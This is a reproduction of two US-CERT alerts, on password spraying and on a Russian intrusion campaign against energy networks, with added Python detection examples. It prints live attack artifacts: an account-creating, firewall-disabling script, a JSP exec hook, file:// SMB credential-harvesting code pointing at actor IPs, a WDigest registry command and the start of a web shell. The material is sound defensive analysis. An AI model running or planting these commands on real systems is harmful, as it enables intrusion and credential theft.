Ticker: Press and Security
US-CERT Alerts - 03/27/18 TA18-086A: Brute Force Attacks Conducted by Cyber Actors
Original release date: March 27, 2018 | Last revised: March 28, 2018
Systems Affected
Networked systems
Overview
According to information derived from FBI investigations, malicious cyber actors are increasingly using a style of brute force attack known as password spraying against organizations in the United States and abroad.

In February 2018, the Department of Justice in the Southern District of New York indicted nine Iranian nationals, who were associated with the Mabna Institute, for computer intrusion offenses related to activity described in this report. The techniques and activity described herein, while characteristic of Mabna actors, are not limited solely to use by this group.

The Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) are releasing this Alert to provide further information on this activity.
Description
In a traditional brute-force attack, a malicious actor attempts to gain unauthorized access to a single account by guessing the password. This can quickly result in the targeted account getting locked out, as commonly used account-lockout policies allow three to five bad attempts during a set period of time. During a password-spray attack (also known as the "low-and-slow" method), the malicious actor attempts a single password against many accounts before moving on to attempt a second password, and so on. This technique allows the actor to remain undetected by avoiding rapid or frequent account lockouts.

Password spray campaigns typically target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols. An actor may target this specific protocol because federated authentication can help mask malicious traffic. Additionally, by targeting SSO applications, malicious actors hope to maximize access to intellectual property during a successful compromise. Email applications are also targeted. In those instances, malicious actors would have the ability to utilize inbox synchronization to (1) obtain unauthorized access to the organization's email directly from the cloud, (2) subsequently download user mail to locally stored email files, (3) identify the entire company's email address list, and/or (4) surreptitiously implement inbox rules for the forwarding of sent and received messages.

Technical Details

Traditional tactics, techniques, and procedures (TTPs) for conducting the password-spray attacks are as follows:
- Using social engineering tactics to perform online research (i.e., Google search, LinkedIn, etc.) to identify target organizations and specific user accounts for initial password spray
- Using easy-to-guess passwords (e.g., "Winter2018", "Password123!") and publicly available tools, execute a password spray attack against targeted accounts by utilizing the identified SSO or web-based application and federated authentication method
- Leveraging the initial group of compromised accounts, downloading the Global Address List (GAL) from a target's email client, and performing a larger password spray against legitimate accounts
- Using the compromised access, attempting to expand laterally (e.g., via Remote Desktop Protocol) within the network, and performing mass data exfiltration using File Transfer Protocol tools such as FileZilla

Indicators of a password spray attack include:
- A massive spike in attempted logons against the enterprise SSO portal or web-based application;
- Using automated tools, malicious actors attempt thousands of logons, in rapid succession, against multiple user accounts at a victim enterprise, originating from a single IP address and computer (e.g., a common User Agent String);
- Attacks have been seen to run for over two hours;
- Employee logons from IP addresses resolving to locations inconsistent with their normal locations.

Typical Victim Environment

The vast majority of known password spray victims share some of the following characteristics [1][2]:
- Use SSO or web-based applications with federated authentication method
- Lack multifactor authentication (MFA)
- Allow easy-to-guess passwords (e.g., "Winter2018", "Password123!")
- Use inbox synchronization, allowing email to be pulled from cloud environments to remote devices
- Allow email forwarding to be set up at the user level
- Limited logging setup, creating difficulty during post-event investigations
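The lockout-evasion mechanics and the logon indicators above, as an added worked example that is not part of the US-CERT alert: `LockoutPolicy`, the SSO portal log format, the source addresses (RFC 5737 documentation ranges) and every log line are constructed for illustration. `password_spray` shows why one password per account per lockout window never trips a three-to-five-attempt policy, and `detect_spray` keys on the combination the alert names, one source IP and one User-Agent string failing against many distinct accounts in a short window, which a single employee mistyping a password never produces.

```python
"""Added example, not from the alert: why spraying evades per-account lockout,
and one detection for it. Policy, log format and log lines are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta
import re

LOCKOUT_THRESHOLD = 5                    # bad attempts per account ...
LOCKOUT_WINDOW = timedelta(minutes=15)   # ... inside this window trigger lockout


class LockoutPolicy:
    """Per-account failure counter with a sliding observation window."""

    def __init__(self, threshold=LOCKOUT_THRESHOLD, window=LOCKOUT_WINDOW):
        self.threshold, self.window = threshold, window
        self.failures = defaultdict(list)    # account -> recent failure times
        self.locked = set()

    def failed_attempt(self, account, when):
        recent = [t for t in self.failures[account] if when - t < self.window]
        recent.append(when)
        self.failures[account] = recent
        if len(recent) >= self.threshold:
            self.locked.add(account)


def brute_force(accounts, passwords, start):
    """Traditional attack: every password against the first account, one per
    second. Returns the set of accounts the policy locked."""
    policy, t = LockoutPolicy(), start
    for _ in passwords:
        policy.failed_attempt(accounts[0], t)
        t += timedelta(seconds=1)
    return policy.locked


def password_spray(accounts, passwords, start):
    """Low-and-slow: one password across every account, then wait out the
    lockout window before the next password, so no account ever accumulates a
    second failure inside the window."""
    policy, t = LockoutPolicy(), start
    for _ in passwords:
        for account in accounts:
            policy.failed_attempt(account, t)
            t += timedelta(seconds=1)
        t += LOCKOUT_WINDOW
    return policy.locked


# Constructed SSO portal log line format (not any real product's schema).
LOG_RE = re.compile(
    r'^(?P<ts>\S+) sso-portal auth result=(?P<result>\w+) user=(?P<user>\S+) '
    r'src=(?P<src>\S+) ua="(?P<ua>[^"]*)"$')


def parse_log(lines):
    events = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            e = m.groupdict()
            e["ts"] = datetime.fromisoformat(e["ts"])
            events.append(e)
    return events


def detect_spray(events, min_accounts=10, window=timedelta(hours=1)):
    """Return {(src_ip, user_agent): distinct_accounts} for sources whose
    failed logons hit at least `min_accounts` different users inside `window`.
    A user mistyping a password fails repeatedly against ONE account and is
    not flagged; a spray fails once against MANY accounts and is."""
    by_source = defaultdict(list)
    for e in events:
        if e["result"] == "fail":
            by_source[(e["src"], e["ua"])].append(e)
    alerts = {}
    for key, fails in by_source.items():
        fails.sort(key=lambda e: e["ts"])
        for i, first in enumerate(fails):
            users = {e["user"] for e in fails[i:] if e["ts"] - first["ts"] <= window}
            if len(users) >= min_accounts:
                alerts[key] = len(users)
                break
    return alerts


# Constructed sample: a 12-account spray from one IP with a scripted
# User-Agent, plus one employee fat-fingering her password from a browser.
T0 = datetime(2018, 3, 20, 2, 0, 0)
SAMPLE_LOG = [
    f'{(T0 + timedelta(seconds=i)).isoformat()} sso-portal auth result=fail '
    f'user=user{i:02d}@example.com src=203.0.113.7 ua="python-requests/2.18.4"'
    for i in range(12)
] + [
    f'{(T0 + timedelta(minutes=5, seconds=i)).isoformat()} sso-portal auth '
    'result=fail user=alice@example.com src=198.51.100.4 ua="Mozilla/5.0"'
    for i in range(3)
] + [
    f'{(T0 + timedelta(minutes=6)).isoformat()} sso-portal auth result=ok '
    'user=alice@example.com src=198.51.100.4 ua="Mozilla/5.0"'
]

if __name__ == "__main__":
    accounts = [f"user{i:02d}" for i in range(50)]
    guesses = ["Winter2018", "Password123!", "Spring2018", "Welcome1", "Company1"]
    print("brute force locked:", brute_force(accounts, guesses, T0))
    print("spray locked:", password_spray(accounts, guesses, T0))
    print("spray alerts:", detect_spray(parse_log(SAMPLE_LOG)))
```

The `min_accounts` threshold is the tuning knob: a shared NAT egress or a proxy will legitimately produce failures for several users from one address, so set it above that baseline and keep the User-Agent in the key, since the alert's indicator is a single IP and a single tool.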
Impact
A successful network intrusion can have severe impacts, particularly if the compromise becomes public and sensitive information is exposed. Possible impacts include:
- Temporary or permanent loss of sensitive or proprietary information;
- Disruption to regular operations;
- Financial losses incurred to restore systems and files; and
- Potential harm to an organization's reputation.
Solution
Recommended Mitigations

To help deter this style of attack, the following steps should be taken:
- Enable MFA and review MFA settings to ensure coverage over all active, internet-facing protocols.
- Review password policies to ensure they align with the latest NIST guidelines [3] and deter the use of easy-to-guess passwords.
- Review IT helpdesk password management related to initial passwords, password resets for user lockouts, and shared accounts. IT helpdesk password procedures may not align to company policy, creating an exploitable security gap.
- Many companies offer additional assistance and tools that can help detect and prevent password spray attacks, such as the Microsoft blog released on March 5, 2018. [4]

Reporting Notice

The FBI encourages recipients of this document to report information concerning suspicious or criminal activity to their local FBI field office or the FBI's 24/7 Cyber Watch (CyWatch). Field office contacts can be identified at www.fbi.gov/contact-us/field. CyWatch can be contacted by phone at (855) 292-3937 or by e-mail at CyWatch@ic.fbi.gov. When available, each report submitted should include the date, time, location, type of activity, number of people, and type of equipment used for the activity, the name of the submitting company or organization, and a designated point of contact. Press inquiries should be directed to the FBI's National Press Office at npo@ic.fbi.gov or (202) 324-3691.
References
[1] NCCIC/US-CERT Tip ST04-002 – Choosing and Protecting Passwords
[2] NCCIC/US-CERT Tip ST05-12 – Supplementing Passwords
[3] NIST Special Publication 800-63 – Digital Identity Guidelines
[4] Microsoft. Azure AD and ADFS best practices: Defending against password spray attacks
Revision History
March 27, 2018: Initial Version
Full report - 03/15/18 TA18-074A: Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors
Original release date: March 15, 2018 | Last revised: March 16, 2018
Systems Affected
- Domain Controllers
- File Servers
- Email Servers
Overview
This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). This alert provides information on Russian government actions targeting U.S. Government entities as well as organizations in the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors. It also contains indicators of compromise (IOCs) and technical details on the tactics, techniques, and procedures (TTPs) used by Russian government cyber actors on compromised victim networks. DHS and FBI produced this alert to educate network defenders to enhance their ability to identify and reduce exposure to malicious activity.

DHS and FBI characterize this activity as a multi-stage intrusion campaign by Russian government cyber actors who targeted small commercial facilities' networks where they staged malware, conducted spear phishing, and gained remote access into energy sector networks. After obtaining access, the Russian government cyber actors conducted network reconnaissance, moved laterally, and collected information pertaining to Industrial Control Systems (ICS).

For a downloadable copy of IOC packages and associated files, see:
- TA18-074A_TLP_WHITE.csv
- TA18-074A_TLP_WHITE.stix.xml
- MIFR-10127623_TLP_WHITE.pdf
- MIFR-10127623_TLP_WHITE_stix.xml
- MIFR-10128327_TLP_WHITE.pdf
- MIFR-10128327_TLP_WHITE_stix.xml
- MIFR-10128336_TLP_WHITE.pdf
- MIFR-10128336_TLP_WHITE_stix.xml
- MIFR-10128830_TLP_WHITE.pdf
- MIFR-10128830_TLP_WHITE_stix.xml
- MIFR-10128883_TLP_WHITE.pdf
- MIFR-10128883_TLP_WHITE_stix.xml
- MIFR-10135300_TLP_WHITE.pdf
- MIFR-10135300_TLP_WHITE_stix.xml

Contact DHS or law enforcement immediately to report an intrusion and to request incident response resources or technical assistance.
Description
Since at least March 2016, Russian government cyber actors, hereafter referred to as "threat actors", targeted government entities and multiple U.S. critical infrastructure sectors, including the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors.

Analysis by DHS and FBI resulted in the identification of distinct indicators and behaviors related to this activity. Of note, the report Dragonfly: Western energy sector targeted by sophisticated attack group, released by Symantec on September 6, 2017, provides additional information about this ongoing campaign. [1]

This campaign comprises two distinct categories of victims: staging and intended targets. The initial victims are peripheral organizations such as trusted third-party suppliers with less secure networks, referred to as "staging targets" throughout this alert. The threat actors used the staging targets' networks as pivot points and malware repositories when targeting their final intended victims. NCCIC and FBI judge the ultimate objective of the actors is to compromise organizational networks, also referred to as the "intended target."

Technical Details

The threat actors in this campaign employed a variety of TTPs, including
- spear-phishing emails (from compromised legitimate accounts),
- watering-hole domains,
- credential gathering,
- open-source and network reconnaissance,
- host-based exploitation, and
- targeting industrial control system (ICS) infrastructure.

Using Cyber Kill Chain for Analysis

DHS used the Lockheed-Martin Cyber Kill Chain model to analyze, discuss, and dissect malicious cyber activity. Phases of the model include reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on the objective. This section will provide a high-level overview of threat actors' activities within this framework.
Stage 1: Reconnaissance

The threat actors appear to have deliberately chosen the organizations they targeted, rather than pursuing them as targets of opportunity. Staging targets held preexisting relationships with many of the intended targets. DHS analysis identified the threat actors accessing publicly available information hosted by organization-monitored networks during the reconnaissance phase. Based on forensic analysis, DHS assesses the threat actors sought information on network and organizational design and control system capabilities within organizations. These tactics are commonly used to collect the information needed for targeted spear-phishing attempts. In some cases, information posted to company websites, especially information that may appear to be innocuous, may contain operationally sensitive information. As an example, the threat actors downloaded a small photo from a publicly accessible human resources page. The image, when expanded, was a high-resolution photo that displayed control systems equipment models and status information in the background.

Analysis also revealed that the threat actors used compromised staging targets to download the source code for several intended targets' websites. Additionally, the threat actors attempted to remotely access infrastructure such as corporate web-based email and virtual private network (VPN) connections.

Stage 2: Weaponization

Spear-Phishing Email TTPs

Throughout the spear-phishing campaign, the threat actors used email attachments to leverage legitimate Microsoft Office functions for retrieving a document from a remote server using the Server Message Block (SMB) protocol. (An example of this request is: file[:]//<remote IP address>/Normal.dotm). As a part of the standard processes executed by Microsoft Word, this request authenticates the client with the server, sending the user's credential hash to the remote server before retrieving the requested file. (Note: transfer of credentials can occur even if the file is not retrieved.) After obtaining a credential hash, the threat actors can use password-cracking techniques to obtain the plaintext password. With valid credentials, the threat actors are able to masquerade as authorized users in environments that use single-factor authentication. [2]

Use of Watering Hole Domains

One of the threat actors' primary uses for staging targets was to develop watering holes. Threat actors compromised the infrastructure of trusted organizations to reach intended targets. [3] Approximately half of the known watering holes are trade publications and informational websites related to process control, ICS, or critical infrastructure. Although these watering holes may host legitimate content developed by reputable organizations, the threat actors altered websites to contain and reference malicious content. The threat actors used legitimate credentials to access and directly modify the website content. The threat actors modified these websites by altering JavaScript and PHP files to request a file icon using SMB from an IP address controlled by the threat actors. This request accomplishes a similar technique observed in the spear-phishing documents for credential harvesting. In one instance, the threat actors added a line of code into the file "header.php", a legitimate PHP file that carried out the redirected traffic.

<img src="file[:]//62.8.193[.]206/main_logo.png" style="height: 1px; width: 1px;" />

In another instance, the threat actors modified the JavaScript file "modernizr.js", a legitimate JavaScript library used by the website to detect various aspects of the user's browser. The file was modified to contain the contents below:

var i = document.createElement("img");
i.src = "file[:]//184.154.150[.]66/ame_icon.png";
i.width = 3;
i.height = 2;

Stage 3: Delivery

When compromising staging target networks, the threat actors used spear-phishing emails that differed from previously reported TTPs. The spear-phishing emails used a generic contract agreement theme (with the subject line "AGREEMENT & Confidential") and contained a generic PDF document titled ``document.pdf. (Note the inclusion of two single back ticks at the beginning of the attachment name.) The PDF was not malicious and did not contain any active code. The document contained a shortened URL that, when clicked, led users to a website that prompted the user for email address and password. (Note: no code within the PDF initiated a download.)

In previous reporting, DHS and FBI noted that all of these spear-phishing emails referred to control systems or process control systems. The threat actors continued using these themes specifically against intended target organizations. Email messages included references to common industrial control equipment and protocols. The emails used malicious Microsoft Word attachments that appeared to be legitimate résumés or curricula vitae (CVs) for industrial control systems personnel, and invitations and policy documents to entice the user to open the attachment.

Stage 4: Exploitation

The threat actors used distinct and unusual TTPs in the phishing campaign directed at staging targets. Emails contained successive redirects: the link http://bit[.]ly/2m0x8IH redirected to http://tinyurl[.]com/h3sdqck, which redirected to the ultimate destination of http://imageliners[.]com/nitel. The imageliners[.]com website contained input fields for an email address and password mimicking a login page for a website.

When exploiting the intended targets, the threat actors used malicious .docx files to capture user credentials. The documents retrieved a file through a "file://" connection over SMB using Transmission Control Protocol (TCP) ports 445 or 139. This connection is made to a command and control (C2) server, either a server owned by the threat actors or that of a victim. When a user attempted to authenticate to the domain, the C2 server was provided with the hash of the password. Local users received a graphical user interface (GUI) prompt to enter a username and password, and the C2 received this information over TCP ports 445 or 139. (Note: a file transfer is not necessary for a loss of credential information.) Symantec's report associates this behavior with the Dragonfly threat actors in this campaign. [1]

Stage 5: Installation

The threat actors leveraged compromised credentials to access victims' networks where multi-factor authentication was not used. [4] To maintain persistence, the threat actors created local administrator accounts within staging targets and placed malicious files within intended targets.

Establishing Local Accounts

The threat actors used scripts to create local administrator accounts disguised as legitimate backup accounts. The initial script "symantec_help.jsp" contained a one-line reference to a malicious script designed to create the local administrator account and manipulate the firewall for remote access. The script was located in "C:\Program Files (x86)\Symantec\Symantec Endpoint Protection Manager\tomcat\webapps\ROOT\".

Contents of symantec_help.jsp
________________________________________
<% Runtime.getRuntime().exec("cmd /C \"" + System.getProperty("user.dir") + "\\..\\webapps\\ROOT\\<enu.cmd>\""); %>
________________________________________

The script "enu.cmd" created an administrator account, disabled the host-based firewall, and globally opened port 3389 for Remote Desktop Protocol (RDP) access.
The script then attempted to add the newly created account to the administrators group to gain elevated privileges. This script contained hard-coded values for the group name "administrator" in Spanish, Italian, German, French, and English.

Contents of enu.cmd
________________________________________
netsh firewall set opmode disable
netsh advfirewall set allprofiles state off
reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List" /v 3389:TCP /t REG_SZ /d "3389:TCP:*:Enabled:Remote Desktop" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List" /v 3389:TCP /t REG_SZ /d "3389:TCP:*:Enabled:Remote Desktop" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core" /v EnableConcurrentSessions /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v EnableConcurrentSessions /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AllowMultipleTSSessions /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v MaxInstanceCount /t REG_DWORD /d 100 /f
net user MS_BACKUP <Redacted_Password> /add
net localgroup Administrators /add MS_BACKUP
net localgroup Administradores /add MS_BACKUP
net localgroup Amministratori /add MS_BACKUP
net localgroup Administratoren /add MS_BACKUP
net localgroup Administrateurs /add MS_BACKUP
net localgroup "Remote Desktop Users" /add MS_BACKUP
net user MS_BACKUP /expires:never
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v MS_BACKUP /t REG_DWORD /d 0 /f
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v dontdisplaylastusername /t REG_DWORD /d 1 /f
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
sc config termservice start= auto
net start termservice
________________________________________

DHS observed the threat actors using this and similar scripts to create multiple accounts within staging target networks. Each account created by the threat actors served a specific purpose in their operation. These purposes ranged from the creation of additional accounts to cleanup of activity. DHS and FBI observed the following actions taken after the creation of these local accounts:
- Account 1: Account 1 was named to mimic backup services of the staging target. This account was created by the malicious script described earlier. The threat actor used this account to conduct open-source reconnaissance and remotely access intended targets.
- Account 2: Account 1 was used to create Account 2 to impersonate an email administration account. The only observed action was to create Account 3.
- Account 3: Account 3 was created within the staging victim's Microsoft Exchange Server. A PowerShell script created this account during an RDP session while the threat actor was authenticated as Account 2. The naming conventions of the created Microsoft Exchange account followed that of the staging target (e.g., first initial concatenated with the last name).
- Account 4: In the latter stage of the compromise, the threat actor used Account 1 to create Account 4, a local administrator account. Account 4 was then used to delete logs and cover tracks.

Scheduled Task

In addition, the threat actors created a scheduled task named reset, which was designed to automatically log out of their newly created account every eight hours.
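One way to hunt for the sequence enu.cmd produces, as an added example that is not part of the alert and not a DHS/FBI tool: the detector below correlates Windows Security events by the logon session that generated them. It assumes the standard Security-log event IDs (4720 user account created, 4732 member added to a security-enabled local group, 4688 process creation with command-line auditing turned on, 4698 scheduled task created) and a parsed record shape with `EventID`, `TimeCreated`, `SubjectLogonId` and the per-event fields; the records in `SAMPLE_EVENTS` are constructed, not victim telemetry. The command-line indicators map to lines of enu.cmd plus the WDigest `UseLogonCredential` change the alert reports under "Registry Modification".

```python
"""Added example, not from the alert: correlate the Windows Security events an
enu.cmd-style script leaves behind. Event IDs are the standard ones (4720 user
account created, 4732 member added to a local group, 4688 process creation
with command-line auditing enabled, 4698 scheduled task created); the records
in SAMPLE_EVENTS are constructed, not victim telemetry."""
from collections import defaultdict
from datetime import datetime, timedelta
import re

# The script hard-codes the local Administrators group in five languages.
ADMIN_GROUPS = {"Administrators", "Administradores", "Amministratori",
                "Administratoren", "Administrateurs"}

# Each indicator corresponds to a line of enu.cmd, plus the WDigest change
# the alert reports under "Registry Modification".
COMMAND_INDICATORS = [
    ("firewall_disabled", re.compile(
        r"netsh\s+(?:advfirewall\s+set\s+allprofiles\s+state\s+off"
        r"|firewall\s+set\s+opmode\s+disable)", re.I)),
    ("rdp_enabled", re.compile(
        r"reg\s+add\s+.*Terminal Server.*fDenyTSConnections.*/d\s+0", re.I)),
    ("rdp_port_opened", re.compile(r"reg\s+add\s+.*GloballyOpenPorts.*3389:TCP", re.I)),
    ("account_hidden", re.compile(r"reg\s+add\s+.*SpecialAccounts\\UserList", re.I)),
    ("token_filter_disabled", re.compile(
        r"reg\s+add\s+.*LocalAccountTokenFilterPolicy.*/d\s+1", re.I)),
    ("wdigest_plaintext", re.compile(
        r"reg\s+add\s+.*WDigest.*UseLogonCredential.*/d\s+1", re.I)),
]


def classify(event):
    """Map one event record to zero or more indicator tags."""
    eid = event["EventID"]
    if eid == 4720:
        return ["local_account_created"]
    if eid == 4732:
        group = event.get("GroupName")
        if group in ADMIN_GROUPS:
            return ["added_to_administrators"]
        if group == "Remote Desktop Users":
            return ["added_to_rdp_users"]
        return []
    if eid == 4698:
        return ["scheduled_task_created"]
    if eid == 4688:
        cmd = event.get("CommandLine", "")
        return [tag for tag, rx in COMMAND_INDICATORS if rx.search(cmd)]
    return []


def correlate(events, window=timedelta(minutes=10), min_findings=3):
    """Group indicators by the logon session (SubjectLogonId) that produced
    them and alert on any session that stacks `min_findings` distinct
    indicators inside `window`. One new service account on its own is routine
    administration; account + admin group + firewall off + RDP on is not."""
    by_session = defaultdict(list)
    for e in sorted(events, key=lambda e: e["TimeCreated"]):
        for tag in classify(e):
            by_session[e["SubjectLogonId"]].append((e["TimeCreated"], tag))
    alerts = {}
    for logon_id, findings in by_session.items():
        for i, (t0, _) in enumerate(findings):
            tags = {tag for t, tag in findings[i:] if t - t0 <= window}
            if len(tags) >= min_findings:
                alerts[logon_id] = tags
                break
    return alerts


T0 = datetime(2017, 6, 27, 12, 30)


def make_event(eid, seconds, logon="0x3e7a1", **fields):
    """Constructed event record, keyed like a parsed Security-log entry."""
    return {"EventID": eid, "TimeCreated": T0 + timedelta(seconds=seconds),
            "SubjectLogonId": logon, **fields}


SAMPLE_EVENTS = [
    make_event(4688, 0, CommandLine="netsh advfirewall set allprofiles state off"),
    make_event(4688, 1, CommandLine='reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'),
    make_event(4720, 2, TargetUserName="MS_BACKUP"),
    make_event(4732, 3, GroupName="Administrators", MemberName="MS_BACKUP"),
    make_event(4732, 4, GroupName="Remote Desktop Users", MemberName="MS_BACKUP"),
    make_event(4688, 5, CommandLine='reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f'),
    # Routine administration in a different session: one indicator, no alert.
    make_event(4720, 600, logon="0x5c2d0", TargetUserName="svc_monitor"),
    make_event(4732, 601, logon="0x5c2d0", GroupName="Performance Log Users", MemberName="svc_monitor"),
]

if __name__ == "__main__":
    for logon_id, tags in correlate(SAMPLE_EVENTS).items():
        print(logon_id, sorted(tags))
```

Correlating on `SubjectLogonId` rather than on the account name matters here because the script runs under whatever session the web shell's Tomcat process inherited, and the account it creates (MS_BACKUP) is not the account doing the creating.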
VPN Software

After achieving access to staging targets, the threat actors installed tools to carry out operations against intended victims. On one occasion, threat actors installed the free version of FortiClient, which they presumably used as a VPN client to connect to intended target networks.

Password Cracking Tools

Consistent with the perceived goal of credential harvesting, the threat actors dropped and executed open source and free tools such as Hydra, SecretsDump, and CrackMapExec. The naming convention and download locations suggest that these files were downloaded directly from publicly available locations such as GitHub. Forensic analysis indicates that many of these tools were executed during the timeframe in which the actor was accessing the system. Of note, the threat actors installed Python 2.7 on a compromised host of one staging victim, and a Python script was seen at C:\Users\<Redacted Username>\Desktop\OWAExchange\.

Downloader

Once inside of an intended target's network, the threat actor downloaded tools from a remote server. The initial versions of the file names contained .txt extensions and were renamed to the appropriate extension, typically .exe or .zip.

In one example, after gaining remote access to the network of an intended victim, the threat actor carried out the following actions:
- The threat actor connected to 91.183.104[.]150 and downloaded multiple files, specifically the file INST.txt.
- The files were renamed to new extensions, with INST.txt being renamed INST.exe.
- The files were executed on the host and then immediately deleted.
- The execution of INST.exe triggered a download of ntdll.exe, and shortly after, ntdll.exe appeared in the running process list of the compromised system of an intended target.
- The registry value "ntdll" was added to the "HKEY_USERS\<USER SID>\Software\Microsoft\Windows\CurrentVersion\Run" key.
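The SMB credential-harvesting hooks described under Stage 2 and Stage 4 (the `file://<remote IP>/Normal.dotm` template reference in the Word attachments, and the `<img src="file://...">` and `i.src = "file://..."` edits to header.php and modernizr.js) can be found before a user opens the file. The scanner below is an added example, not from the alert and not a DHS/FBI tool. It assumes the Word attachment wires its remote template in the standard OOXML way, an `attachedTemplate` relationship with `TargetMode="External"` in `word/_rels/settings.xml.rels`; the sample document it builds and the HTML/JS fragments are constructed here with RFC 5737 documentation addresses, not the actor infrastructure from the alert.

```python
"""Added example, not from the alert: find the outbound SMB references used for
credential harvesting in Office documents and in web files. The sample .docx
and the HTML/JS fragments are constructed; hosts are documentation addresses."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"

# file://host/path, file:\\host\path, or a bare UNC path \\host\share
SMB_TARGET = re.compile(
    r'(?:file:(?://|\\\\)|\\\\)([A-Za-z0-9.\-]+)[\\/]([^\s"\'<>]+)', re.IGNORECASE)


def scan_text(blob, source="<text>"):
    """Return (source, host, path) for every SMB-style reference in text.
    Covers the <img src="file://..."> and the JavaScript i.src cases."""
    return [(source, m.group(1), m.group(2)) for m in SMB_TARGET.finditer(blob)]


def scan_docx(data):
    """Open an OOXML package from bytes. Every .rels part is parsed and any
    relationship with TargetMode="External" whose Target is an SMB host is
    reported (that is how an attached template at file://host/Normal.dotm is
    wired in); all other parts are scanned as text for the same pattern."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as package:
        for name in package.namelist():
            content = package.read(name)
            if name.endswith(".rels"):
                for rel in ET.fromstring(content).iter(REL_NS + "Relationship"):
                    m = SMB_TARGET.search(rel.get("Target", ""))
                    if rel.get("TargetMode") == "External" and m:
                        hits.append((name, m.group(1), m.group(2)))
            else:
                hits.extend(scan_text(content.decode("utf-8", "replace"), name))
    return hits


def build_sample_docx(template_target):
    """Constructed minimal .docx whose settings part points its attached
    template at `template_target` (only the parts the scanner needs)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as package:
        package.writestr("[Content_Types].xml",
            '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        package.writestr("word/settings.xml",
            '<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
            'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
            '<w:attachedTemplate r:id="rId1"/></w:settings>')
        package.writestr("word/_rels/settings.xml.rels",
            '<?xml version="1.0"?>'
            '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" '
            f'Target="{template_target}" TargetMode="External"/></Relationships>')
    return buf.getvalue()


# Constructed equivalents of the header.php and modernizr.js modifications.
SAMPLE_HEADER_PHP = '<img src="file://192.0.2.20/main_logo.png" style="height: 1px; width: 1px;" />'
SAMPLE_MODERNIZR_JS = ('var i = document.createElement("img");'
                       'i.src = "file://192.0.2.21/ame_icon.png";i.width = 3;i.height=2;')

if __name__ == "__main__":
    print(scan_docx(build_sample_docx("file://192.0.2.10/Normal.dotm")))
    print(scan_text(SAMPLE_HEADER_PHP, "header.php"))
    print(scan_text(SAMPLE_MODERNIZR_JS, "modernizr.js"))
```

An `https://` external hyperlink relationship is left alone, since only `file:` and UNC targets make Word authenticate over SMB; the same regular expression works on any text part of a package, so a `file://` URL hidden in `document.xml` or a hyperlink part is caught as well.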
Persistence Through .LNK File Manipulation

The threat actors manipulated LNK files, commonly known as Microsoft Windows shortcut files, to repeatedly gather user credentials. Default Windows functionality enables icons to be loaded from a local or remote Windows repository. The threat actors exploited this built-in Windows functionality by setting the icon path to a remote server controlled by the actors. When the user browses to the directory, Windows attempts to load the icon and initiate an SMB authentication session. During this process, the active user's credentials are passed through the attempted SMB connection.

Four of the observed LNK files were "SETROUTE.lnk", "notepad.exe.lnk", "Document.lnk" and "desktop.ini.lnk". These names appeared to be contextual, and the threat actor may use a variety of other file names while using this tactic. Two of the remote servers observed in the icon path of these LNK files were 62.8.193[.]206 and 5.153.58[.]45. Below is the parsed content of one of the LNK files:

Parsed output for file: desktop.ini.lnk

Registry Modification

The threat actor would modify key systems to store plaintext credentials in memory. In one instance, the threat actor executed the following command.

reg add "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f

Stage 6: Command and Control

The threat actors commonly created web shells on the intended targets' publicly accessible email and web servers. The threat actors used three different filenames ("global.aspx", "autodiscover.aspx" and "index.aspx") for two different webshells. The difference between the two groups was the "public string Password" field.
Beginning Contents of the Web Shell
________________________________________
<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%>
<%@ import Namespace="System"%>
<%@ import Namespace="System.IO"%>
<%@ import Namespace="System.Diagnostics"%>
<%@ import Namespace="System.Data"%>
<%@ import Namespace="System.Management"%>
<%@ import Namespace="System.Data.OleDb"%>
<%@ import Namespace="Microsoft.Win32"%>
<%@ import Namespace="System.Net.Sockets" %>
<%@ import Namespace="System.Net" %>
